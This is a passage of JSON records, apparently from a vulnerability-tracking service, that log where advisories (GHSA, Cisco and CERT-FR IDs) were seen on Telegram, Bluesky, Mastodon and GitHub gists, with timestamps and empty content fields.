"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MF24-5FXF-F4X5", "type": "seen", "source": "https://t.me/reverseame/4662", "content": "", "creation_timestamp": "2026-08-03T02:13:57.388599Z"}, {"uuid": "e286ea7b-3392-4587-9fdb-76b141fab103", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4MQG-H5JF-J9M7", "type": "seen", "source": "https://t.me/reverseame/3787", "content": "", "creation_timestamp": "2026-08-03T02:07:10.954102Z"}, {"uuid": "c19d48c4-15b3-4124-878b-f4a477572ed9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hrxh-6v49-42gf", "type": "seen", "source": "https://bsky.app/profile/mfahlandt.bsky.social/post/3ms6hejb7hx2j", "content": "", "creation_timestamp": "2026-08-03T12:03:59.761753Z"}, {"uuid": "6fab0d99-c599-433c-b88c-2220a8a7901e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jhpw-976m-542j", "type": "seen", "source": "https://gist.github.com/alon710/73fc02db3c552514344a681ca47f8151", "content": "", "creation_timestamp": "2026-08-03T16:32:48.601115Z"}, {"uuid": "570816cc-d48d-46c6-8f2b-8cd3935d4eb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-537c-gmf6-5ccf", "type": "seen", "source": "https://infosec.exchange/users/mmguero/statuses/116964108001076474", "content": "", "creation_timestamp": "2026-07-22T14:30:53.673253Z"}, {"uuid": "ad93b551-2cde-478c-89e5-fdb88e6bcd3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-c35g-mgc3-95rx", "type": "seen", "source": "https://infosec.exchange/users/mmguero/statuses/116964108001076474", "content": "", "creation_timestamp": "2026-07-22T14:30:53.503217Z"}, {"uuid": "11d41b99-bea6-48b9-b101-fb796757bc0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m5fr-rv3h-xg2r", "type": "seen", "source": "https://infosec.exchange/users/mmguero/statuses/116964108001076474", "content": "", "creation_timestamp": "2026-07-22T14:30:53.379819Z"}, {"uuid": "b1574819-03e7-4c5e-a6d9-254688b38ec8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ALE-008", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/116964235036563174", "content": "", "creation_timestamp": "2026-07-22T15:03:13.707424Z"}, {"uuid": "2b2acb80-e7ff-410b-b30b-6bb3cbbdde5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9wcp-9r3j-383q", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mramfmee6z2e", "content": "", "creation_timestamp": "2026-07-22T15:14:06.920261Z"}, {"uuid": "a712c9e3-d2cb-44cc-a3c9-847bbc71571e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MVH2-CRG5-V77C", "type": "seen", "source": "https://t.me/bdufstecru/3334", "content": "", "creation_timestamp": "2026-07-22T16:00:04.190727Z"}, {"uuid": "8ce06223-1877-4d20-9785-6c16a2e49255", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g7r4-m6w7-qqqr", "type": "seen", "source": "https://gist.github.com/xxdesmus/73ee08aabd15760b60f285cb2b32453f", "content": "", "creation_timestamp": "2026-07-22T18:18:22.178035Z"}, {"uuid": "069b177d-69ed-40ea-9c24-e5668102a99e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gv7w-rqvm-qjhr", "type": "seen", "source": "https://gist.github.com/xxdesmus/73ee08aabd15760b60f285cb2b32453f", "content": "", "creation_timestamp": "2026-07-22T18:18:22.126094Z"}, {"uuid": "b37f36ed-efab-4325-85a5-e3c298fa367d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MVH2-CRG5-V77C", "type": "seen", "source": "https://t.me/bdufstecru/3334", "content": "", "creation_timestamp": "2026-07-23T00:00:22.740891Z"}, {"uuid": "cb66244b-683d-4c34-883f-1861a0e9419c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3wp3-xxj9-5jqq", "type": "seen", "source": "https://gist.github.com/alon710/9bcf9d1bd3d7650ebf44f14eff2dc08a", "content": "", "creation_timestamp": "2026-07-24T22:35:49.968265Z"}, {"uuid": "e81caac5-ec8a-4279-b9d5-6126a3e8108a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m3qf-58wf-w979", "type": "seen", "source": "https://gist.github.com/alon710/dc8fbe1b073218955707634edeb9a32e", "content": "", "creation_timestamp": "2026-07-24T22:35:49.881414Z"}, {"uuid": "40cff5cd-b499-49bd-8ea4-39bd4fcce1ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6VCH-Q96H-7GC3", "type": "seen", "source": "https://gist.github.com/alon710/c51377a7e449134a651b4b7f09b602f4", "content": "", "creation_timestamp": "2026-07-24T23:31:23.524636Z"}, {"uuid": "0c58a568-22ba-49c0-a5cf-3eb9ad30fd7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6VCH-Q96H-7GC3", "type": "seen", "source": "https://gist.github.com/alon710/c51377a7e449134a651b4b7f09b602f4", "content": "", "creation_timestamp": "2026-07-25T00:00:18.240015Z"}, {"uuid": "d1aaf40c-eb4c-4f80-83b3-b9d5bc09a97f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8Q49-2H5H-434X", "type": "seen", "source": "https://gist.github.com/alon710/2148318b0f0c526c708bd7a87404909b", "content": "", "creation_timestamp": "2026-07-25T00:32:46.717663Z"}, {"uuid": "20279e3a-9438-409c-b03a-fa315d67cb54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-JPCW-4WR7-C3VQ", "type": "seen", "source": "https://gist.github.com/alon710/b490d29b6d050fb00e7a5ccf95bdfcac", "content": "", "creation_timestamp": "2026-07-25T01:39:15.120197Z"}, {"uuid": "9131b926-81ae-404b-b2a6-2d474b6408ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-j6g5-3hh3-pgw8", "type": "seen", "source": "https://gist.github.com/alon710/6a8c8e9d5478e9dc83fe93da983dd382", "content": "", "creation_timestamp": "2026-07-25T02:43:25.322717Z"}, {"uuid": "c5a65594-7570-4030-a745-9950ed50240e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-XG4H-6GFC-H4M8", "type": "seen", "source": "https://gist.github.com/alon710/0779a48575ed13d9f77e2dad5309ea43", "content": "", "creation_timestamp": "2026-07-25T03:31:51.635898Z"}, {"uuid": "57a4bcf9-2552-4ce4-a745-8eec345bf0c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mh99-v99m-4gvg", "type": "seen", "source": "https://gist.github.com/BrendanPatric/94f86501f020c7775dbd8239cf371c2e", "content": "", "creation_timestamp": "2026-07-25T03:24:18.336021Z"}, {"uuid": "4c670bdf-a526-44ef-b475-d7f920ffcd00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jvxp-qmx7-gjpx", "type": "seen", "source": "https://gist.github.com/alon710/5da01f85fee825f05b5c606f0085a6c9", "content": "", "creation_timestamp": "2026-07-25T04:31:18.097857Z"}, {"uuid": "be117cb9-f41d-4a66-b16e-7c472f8c065f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hmj8-5xmh-5573", "type": "seen", "source": "https://gist.github.com/alon710/610364d1088c3e73d54d1422be1a22f2", "content": "", "creation_timestamp": "2026-07-25T05:31:39.963550Z"}, {"uuid": "b3a0cc96-5d32-40fd-be5f-1387c7933c64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3R53-75J5-3G7J", "type": "seen", "source": "https://gist.github.com/alon710/31362352a2fade2501771882d0062b85", "content": "", "creation_timestamp": "2026-07-25T06:31:04.273103Z"}, {"uuid": "3aaf8967-7a0e-4a1f-b024-ba3926af00e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6xj8-qv9j-xcjq", "type": "seen", "source": "https://gist.github.com/alon710/e9c3b68dd2dd0898bdce9f4d836eceff", "content": "", "creation_timestamp": "2026-07-25T07:31:13.935083Z"}, {"uuid": "c95d4b28-e244-4ae3-934f-c7ed9973eb02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FWJX-9P69-H25H", "type": "seen", "source": "https://gist.github.com/alon710/6f3f1af38179861cbb241baf278fc776", "content": "", "creation_timestamp": "2026-07-25T08:31:11.350326Z"}, {"uuid": "48dcb33f-d25a-4e99-a5fe-e6c7b8c363cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FP43-VJ7G-PG92", "type": "seen", "source": "https://gist.github.com/alon710/98c2aa788fd9c777f6b5611c16810427", "content": "", "creation_timestamp": "2026-07-25T09:31:15.115642Z"}, {"uuid": "63514e09-0700-4d0d-a267-40ee145ce43e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gm3r-q2wp-hw87", "type": "seen", "source": "https://gist.github.com/alon710/8ae8c0df3840a4fc9ad0abc329a9ce1f", "content": "", "creation_timestamp": "2026-07-25T10:31:26.603280Z"}, {"uuid": "83a5f0a6-137c-4bde-affa-da11dea00d48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-Q53C-4PRM-W95Q", "type": "seen", "source": "https://gist.github.com/alon710/7d82b3a29a466133e3b991f0cb56fd86", "content": "", "creation_timestamp": "2026-07-25T11:31:34.212376Z"}, {"uuid": "7bf933a1-a0ed-4c6d-a285-170c4e057774", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-r292-9mhp-454m", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3mrhsyv23a525", "content": "", "creation_timestamp": "2026-07-25T12:00:55.133392Z"}, {"uuid": "80064943-23f2-4f6a-b9ae-af450afce574", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-W4HW-QCX7-56PR", "type": "seen", "source": "https://gist.github.com/alon710/dc8e3d82c3fbe561c037061a882b0db5", "content": "", "creation_timestamp": "2026-07-25T12:32:06.469040Z"}, {"uuid": "6ba9bc80-41d1-475f-8a7c-4dd5825f3a85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6V4M-FW66-8R4X", "type": "seen", "source": "https://gist.github.com/alon710/4f741e2f37db8bd62ab69cf05173516c", "content": "", "creation_timestamp": "2026-07-25T13:48:43.222677Z"}, {"uuid": "583e00d7-41fb-434c-89ef-f570a4eb671d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-29w2-fq35-v728", "type": "seen", "source": "https://gist.github.com/alon710/88746e1a08ea6a0846d93f6c2420614d", "content": "", "creation_timestamp": "2026-07-25T14:31:52.533476Z"}, {"uuid": "d2d32b44-83a9-4022-b2e9-708ddf7e7fbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-XQ3M-2V4X-88GG", "type": "seen", "source": "https://t.me/ZerodayAlert/665", "content": "", "creation_timestamp": "2026-07-25T15:00:07.948606Z"}, {"uuid": "18849c7d-7f1c-480b-9831-786d6cf41038", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20170322-IOX", "type": "seen", "source": "https://t.me/KaitNews/3649", "content": "", "creation_timestamp": "2026-07-26T07:02:07.888476Z"}, {"uuid": "ca97a911-8482-4b7c-bcb8-e44af6d3e1ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20170405-AME", "type": "seen", "source": "https://t.me/KaitNews/3896", "content": "", "creation_timestamp": "2026-07-26T07:02:07.379028Z"}, {"uuid": "1d35b4b2-ce54-40f1-ba05-7f196e1f3ad0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20180129-ASA1", "type": "seen", "source": "https://t.me/KaitNews/7528", "content": "", "creation_timestamp": "2026-07-26T07:01:52.426248Z"}, {"uuid": "0ae57123-8fb2-40aa-acd5-6a4ef5fb5bc1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20180409-SMI", "type": "seen", "source": "https://t.me/KaitNews/7703", "content": "", "creation_timestamp": "2026-07-26T07:01:51.994974Z"}, {"uuid": "cd1b3107-8137-4878-a046-21ef567a4e64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20180328-QOS", "type": "seen", "source": "https://t.me/KaitNews/7710", "content": "", "creation_timestamp": "2026-07-26T07:01:51.791806Z"}, {"uuid": "f6ec9ae8-9c0c-4d74-b11b-29fa52f43d15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-84Q8-HPHJ-4R7W", "type": "seen", "source": "https://t.me/zhatez/1367", "content": "", "creation_timestamp": "2026-07-26T07:01:47.747704Z"}, {"uuid": "b4f68508-14d6-4590-b9f5-6a813163390b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-44JH-J22R-33WQ", "type": "seen", "source": "https://t.me/EchelonEyes/1200", "content": "", "creation_timestamp": "2026-07-27T00:01:06.938393Z"}, {"uuid": "e42d26ec-93bb-4697-b6bf-b5639edfb14d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-M2QF-HXJV-5GPQ", "type": "seen", "source": "https://t.me/EchelonEyes/1499", "content": "", "creation_timestamp": "2026-07-27T00:01:04.572120Z"}, {"uuid": "292b3c20-27da-430f-9da8-8fc326b232e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2RMR-XW8M-22Q9", "type": "seen", "source": "https://t.me/EchelonEyes/2145", "content": "", "creation_timestamp": "2026-07-27T00:00:55.857531Z"}, {"uuid": "d496d7fd-6412-4f23-9ecc-cf69685edece", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5PW9-F9R4-MV2R", "type": "seen", "source": "https://t.me/EchelonEyes/2791", "content": "", "creation_timestamp": "2026-07-27T00:00:47.595440Z"}, {"uuid": "6b95049b-cfe1-45e0-ae5f-eb366bb865e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-VJH7-7G9H-FJFH", "type": "seen", "source": "https://t.me/EchelonEyes/3678", "content": "", "creation_timestamp": "2026-07-27T00:00:37.988472Z"}, {"uuid": "e98511ce-1fdb-45e4-ac85-90460d92cc31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-HC4M-Q9JH-XW4J", "type": "seen", "source": "https://gist.github.com/alon710/92ad6f547c2ba0c3ac7a937f90c439cc", "content": "", "creation_timestamp": "2026-07-28T16:31:30.511355Z"}, {"uuid": "3458dfbc-4c93-4bd4-a99f-bc13cad0cbf8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rmxw-pq4x-3fvh", "type": "seen", "source": "https://gist.github.com/alon710/9b8006195456ffdcd967a102fe0db5d4", "content": "", "creation_timestamp": "2026-07-29T00:00:29.177710Z"}, {"uuid": "f606c419-df74-403d-8765-13ae834939d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-964w-f6gj-5236", "type": "seen", "source": "https://gist.github.com/alon710/3d4b381ed70bde1d61201f63076c47f0", "content": "", "creation_timestamp": "2026-07-29T00:00:29.059484Z"}, {"uuid": "b6e2b65b-5786-4030-ac88-89beefe31e8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-GV7G-JM28-CR3M", "type": "seen", "source": "https://t.me/true_secator/8452", "content": "", "creation_timestamp": "2026-07-29T00:00:12.734535Z"}, {"uuid": "747e9f8f-6fa5-4862-9ba4-a438ea353b26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-84Q8-HPHJ-4R7W", "type": "seen", "source": "https://t.me/zhatez/1367", "content": "", "creation_timestamp": "2026-07-29T00:00:09.934780Z"}, {"uuid": "de26d3ad-7a30-42e6-a1a4-dda4ce74e42c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2xmw-f8j8-wfxc", "type": "seen", "source": "https://gist.github.com/alon710/3def853e2525c617d6890d62679fbc37", "content": "", "creation_timestamp": "2026-07-29T00:31:42.761014Z"}, {"uuid": "f8da1744-f318-4afe-930c-983ac3318e7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-GV7G-JM28-CR3M", "type": "seen", "source": "https://t.me/S_E_Reborn/6502", "content": "", "creation_timestamp": "2026-07-29T01:00:04.167078Z"}, {"uuid": "3ba3d04d-46be-4b4f-b5eb-069e8860c451", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6xx4-9wp6-65p7", "type": "seen", "source": "https://gist.github.com/alon710/dbe46a55c7d568d0e868122c0cd7642c", "content": "", "creation_timestamp": "2026-07-29T01:31:18.844380Z"}, {"uuid": "78446a59-2eac-4a1c-8c4f-7b99310afc56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vj5c-m527-mpff", "type": "seen", "source": "https://gist.github.com/alon710/f56e7fea90184a0067b486a540ca3738", "content": "", "creation_timestamp": "2026-07-29T02:31:53.671822Z"}, {"uuid": "5c036fca-c137-4786-a309-82312c8c8b6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20180328-QOS", "type": "published-proof-of-concept", "source": "https://t.me/KaitNews/7710", "content": "", "creation_timestamp": "2026-07-29T03:00:04.077412Z"}, {"uuid": "a6ec0237-8f6c-49d6-9185-a1dcb2a57562", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20180409-SMI", "type": "seen", "source": "https://t.me/KaitNews/7703", "content": "", "creation_timestamp": "2026-07-29T03:00:03.673738Z"}, {"uuid": "49236602-8e26-4d9b-8273-a327c91c2a08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20180129-ASA1", "type": "seen", "source": "https://t.me/KaitNews/7528", "content": "", "creation_timestamp": "2026-07-29T04:00:06.024092Z"}, {"uuid": "15a21092-94ac-4595-badd-9154ac93d1dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6wcc-39rp-hh9p", "type": "seen", "source": "https://gist.github.com/alon710/58765246c17b37995ac42b87551c99f8", "content": "", "creation_timestamp": "2026-07-29T04:31:03.850214Z"}, {"uuid": "ab6f132e-9178-455a-9f17-bae6e3bb824d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-whmm-qj9r-wvr2", "type": "seen", "source": "https://gist.github.com/alon710/7cdf75a52c50aebac3f872ab5cf7bfbf", "content": "", "creation_timestamp": "2026-07-29T05:32:47.973473Z"}, {"uuid": "01c61fe2-9e69-4257-a1d1-94efaa6e8a18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wg2q-39h6-66x9", "type": "seen", "source": "https://gist.github.com/alon710/9b6eb86646df2d26df9c07ebf0051d99", "content": "", "creation_timestamp": "2026-07-29T06:32:35.136703Z"}, {"uuid": "0ffbdee6-0166-46dc-b1a9-4ff9f187cc7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hq33-8jgp-8qq3", "type": "seen", "source": "https://gist.github.com/alon710/5949a16fe56601aa95656371bd907946", "content": "", "creation_timestamp": "2026-07-29T07:31:46.131053Z"}, {"uuid": "c38714ae-47c2-4bb4-9234-66f85304fd60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4C8J-MGM4-QQVP", "type": "seen", "source": "https://t.me/nxblog/1745", "content": "", "creation_timestamp": "2026-07-29T08:01:20.608232Z"}, {"uuid": "bbfab61f-388a-4a4e-ab25-a664484751a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FVCV-HH55-X3R4", "type": "seen", "source": "https://t.me/nxblog/1758", "content": "", "creation_timestamp": "2026-07-29T08:01:20.557462Z"}, {"uuid": "e919bd7f-e6ae-4ba2-bce1-db6c4f374fda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rjrw-mjq6-hpmm", "type": "seen", "source": "https://gist.github.com/alon710/b7d97e28e81c8217964934097e896a47", "content": "", "creation_timestamp": "2026-07-29T08:31:18.069627Z"}, {"uuid": "3f64e500-cde5-451d-9b64-5a68b21502c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wjv6-jcfj-mf9r", "type": "seen", "source": "https://gist.github.com/alon710/22ff7de2f68c39286e130a0c2981900e", "content": "", "creation_timestamp": "2026-07-29T09:32:26.886185Z"}, {"uuid": "b654b4d9-272d-4081-9195-e4d013f97aee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-M985-3F3V-CWMM", "type": "seen", "source": "https://t.me/reverseame/1405", "content": "", "creation_timestamp": "2026-07-29T12:02:55.398691Z"}, {"uuid": "5e850f10-682a-43cf-b03b-7b053f3183ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-PW56-C55X-CM9M", "type": "seen", "source": "https://t.me/reverseame/2897", "content": "", "creation_timestamp": "2026-07-29T12:02:36.034620Z"}, {"uuid": "3abf8704-693e-4860-acce-bba2f3075e01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4MQG-H5JF-J9M7", "type": "seen", "source": "https://t.me/reverseame/3787", "content": "", "creation_timestamp": "2026-07-29T12:02:25.737756Z"}, {"uuid": "680a38e8-bff2-42b2-9112-6481e33540b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MF24-5FXF-F4X5", "type": "seen", "source": "https://t.me/reverseame/4662", "content": "", "creation_timestamp": "2026-07-29T12:02:12.508141Z"}, {"uuid": "b5a27aaa-ae37-4419-ade5-d3621154b5f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-M42G-XG4C-5F3H", "type": "seen", "source": "https://t.me/sdnv_funkhole/1604", "content": "", "creation_timestamp": "2026-07-29T12:01:57.384488Z"}, {"uuid": "69483956-7327-4b78-a8f8-029b3a331180", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20180328-BFD", "type": "seen", "source": "Telegram/hGorQbjXAWCmitjk3p41x3VI_IGJuK055h4LBYzY57_Q4Q", "content": "", "creation_timestamp": "2026-07-29T12:01:45.229294Z"}, {"uuid": "3c46dd31-f3be-4753-86e5-28d8f4a23dd5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20180328-BFD", "type": 